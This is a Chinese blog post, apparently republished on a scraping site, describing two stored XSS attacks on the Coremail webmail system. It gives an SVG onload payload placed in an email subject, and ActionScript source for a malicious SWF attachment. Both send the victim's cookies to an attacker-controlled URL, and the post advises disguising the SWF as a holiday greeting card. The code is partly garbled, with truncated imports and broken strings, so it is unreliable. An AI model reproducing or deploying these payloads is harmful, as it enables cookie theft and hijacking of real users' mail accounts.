Coremail邮件系统存储型XSS两个

阅读: 评论:0

Coremail邮件系统存储型XSS两个

Coremail邮件系统存储型XSS两个

(1):Coremail邮件系统存储型XSS之一

给受害者发送主题如下的邮件:

<svg onload='img=new Image();img.src="///geo.php?get="&#kie;'>



当受害者试图打开邮件时,cookie将会被窃取:




(2):Coremail邮件系统存储型XSS之二

将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):
swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):



package {al.ExternalInterface;import flash.display.Sprite;import flash.display.Sprite;import flash.events.Event;import flash.URLLoader;import flash.URLRequest;TextField;TextFieldAutoSize;l.*;import flash.events.IOErrorEvent;import flash.events.*;import flash.*;/*** @author User*/public class csrf extends Sprite {private var loader:URLLoader;public function csrf() {var res:String = ExternalInterface.call("function(){kie;}");
doGet(res);}private function doGet(res:String):void{loader = new URLLoader();var target:String = ".php?get="+res;
var request:URLRequest = new URLRequest(target);try {loader.load(request);} catch (error:Error) {sendDatatoJS("Error: " + StackTrace());
}}private function sendDatatoJS(data:String):void{trace(data);ExternalInterface.call("colsole.log", data);
}}}

 

一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。

转载于:.html

本文发布于:2024-02-01 13:08:58,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170676414036818.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:邮件系统   两个   Coremail   XSS
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23